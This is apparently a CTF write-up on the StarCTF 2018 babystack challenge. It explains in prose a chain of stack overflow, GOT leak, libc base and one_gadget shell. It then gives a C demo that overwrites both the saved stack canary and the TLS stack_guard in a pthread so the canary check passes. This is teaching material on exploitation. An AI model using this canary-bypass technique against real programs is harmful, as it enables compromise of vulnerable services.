babystack
In the StarCTF 2018 babystack challenge there is a stack overflow that lets us leak the GOT entry of atol, compute the libc base address from it, and jump to a one_gadget in libc that executes execve("/bin/sh"). The interesting part is overwriting the canary's reference value with a value of our choosing, so that the saved return address can be replaced without the program aborting on the canary check.

When a program uses pthreads, each thread's Thread Local Storage (TLS) is placed in the same mapping as that thread's stack, just above it, so a sufficiently long stack overflow reaches it. On x86_64 glibc the canary's reference value is the stack_guard field of the thread control block in TLS (read through %fs:0x28); the function epilogue compares the copy saved in the stack frame against that field and calls __stack_chk_fail if they differ. In this challenge the overflow covers both the saved copy and stack_guard, so writing the same arbitrary value into both passes the check (see http://www.openwall.com/lists/oss-security/2018/02/27/5). This is an interesting ROP challenge for learning how to bypass NX, stack canaries, Full RELRO and ASLR in x86_64 binaries.
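The following program is an added example, not the write-up's exploit. It assumes x86_64 Linux with glibc (the TCB at %fs:0 and stack_guard at %fs:0x28) and a compiler that understands GNU inline asm and __attribute__((noinline)). It demonstrates the two facts the bypass relies on: first, from inside a pthread the TCB lies a few KiB above a local buffer, inside the thread's own stack mapping; second, the epilogue only compares the frame copy against %fs:0x28, so a protected function whose copy and reference were both replaced by the same fake value returns normally. The "overflow" in the second step is simulated with two direct 8-byte writes rather than a real linear overwrite, because a real one would also clobber the rest of struct pthread that the demo still needs in order to join the thread; the fake value and the 1 MiB stack size are arbitrary choices for the demo.

```c
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DEMO_STACK_SIZE (1u << 20)  /* 1 MiB thread stack, chosen for this demo */

/* Canary reference value: tcbhead_t.stack_guard, i.e. %fs:0x28 on x86_64 glibc. */
static uintptr_t read_tls_canary(void) {
    uintptr_t v;
    __asm__ volatile("mov %%fs:0x28, %0" : "=r"(v));
    return v;
}

static void write_tls_canary(uintptr_t v) {
    __asm__ volatile("mov %0, %%fs:0x28" : : "r"(v) : "memory");
}

/* %fs:0 holds the TCB's own address (tcbhead_t.tcb): the base of the TLS block. */
static uintptr_t tls_base(void) {
    uintptr_t v;
    __asm__ volatile("mov %%fs:0, %0" : "=r"(v));
    return v;
}

struct layout { uintptr_t buf, tcb; intptr_t dist; };

/* Step 1: from inside a pthread, how far above a local buffer is the TCB? */
static void *measure_thread(void *arg) {
    struct layout *l = arg;
    char buf[64];
    memset(buf, 'A', sizeof buf);
    l->buf = (uintptr_t)buf;
    l->tcb = tls_base();
    l->dist = (intptr_t)(l->tcb - l->buf);
    __asm__ volatile("" : : "r"(buf) : "memory");  /* keep buf in the frame */
    return NULL;
}

/* Returns 1 if the TCB lies above the buffer and inside the thread's own
   stack mapping, i.e. within reach of a linear stack overflow. */
int tcb_is_within_thread_stack(struct layout *out) {
    pthread_attr_t attr;
    pthread_t th;
    struct layout l = {0, 0, 0};
    pthread_attr_init(&attr);
    pthread_attr_setstacksize(&attr, DEMO_STACK_SIZE);
    int rc = pthread_create(&th, &attr, measure_thread, &l);
    pthread_attr_destroy(&attr);
    if (rc != 0) return 0;
    pthread_join(th, NULL);
    if (out) *out = l;
    return l.dist > 0 && l.dist < (intptr_t)DEMO_STACK_SIZE;
}

/* Step 2: a canary-protected frame. Write the same fake value into the frame's
   canary copy and into %fs:0x28, then return. Returns 1 if the copy was found and
   patched, 2 if no copy was found in the expected slots (then %fs:0x28 is left
   alone so the epilogue cannot abort; e.g. built without -fstack-protector). */
__attribute__((noinline)) static int victim(uintptr_t orig, uintptr_t fake) {
    char buf[256];
    int patched = 0;
    memset(buf, 'B', sizeof buf);
    char *p = buf;
    __asm__ volatile("" : "+r"(p));  /* hide the pointer's origin from the optimiser */
    /* With -fstack-protector the compiler places char arrays directly below the
       canary copy, so look in the two 8-byte slots above buf. */
    for (unsigned off = 0; off < 16; off += 8) {
        uintptr_t *slot = (uintptr_t *)(p + sizeof buf + off);
        if (*slot == orig) { *slot = fake; patched = 1; }
    }
    if (patched) write_tls_canary(fake);   /* the second half of the "overflow" */
    __asm__ volatile("" : : "r"(buf) : "memory");
    return patched ? 1 : 2;                /* epilogue compares fake == fake */
}

static void *bypass_thread(void *arg) {
    int *result = arg;
    uintptr_t orig = read_tls_canary();
    uintptr_t fake = 0x4141414141414100ULL;  /* attacker-chosen; low byte 0 like glibc's */
    *result = victim(orig, fake);
    /* Frames entered before the swap (this one, start_thread) still hold the
       real value: restore it before unwinding into them. */
    write_tls_canary(orig);
    if (read_tls_canary() != orig) *result = 0;
    return NULL;
}

/* Returns 1 if a protected frame returned with the swapped canary, 2 if
   victim() had no canary copy to patch, 0 on failure. */
int canary_bypass_demo(void) {
    pthread_t th;
    int result = 0;
    if (pthread_create(&th, NULL, bypass_thread, &result) != 0) return 0;
    pthread_join(th, NULL);
    return result;
}

int main(void) {
    struct layout l = {0, 0, 0};
    char mbuf[16] = {0};
    int in_stack = tcb_is_within_thread_stack(&l);
    printf("pthread: buf=%#lx tcb=%#lx dist=%ld bytes -> %s\n",
           (unsigned long)l.buf, (unsigned long)l.tcb, (long)l.dist,
           in_stack ? "TCB reachable from a stack overflow" : "unexpected layout");
    printf("main thread: tcb - buf = %ld bytes (main-thread TLS is a separate mapping)\n",
           (long)(tls_base() - (uintptr_t)mbuf));
    printf("canary bypass demo: %d\n", canary_bypass_demo());
    return in_stack ? 0 : 1;
}
```

Build with -fstack-protector-all (or rely on a distribution default of -fstack-protector-strong) to see victim() return 1; the distance printed for the pthread is the budget an overflow needs to reach stack_guard, while the main thread's TLS is not adjacent to its stack, which is why the technique is specific to threads. The restore of the original value before bypass_thread returns is what a real exploit does not need, since it never returns into start_thread.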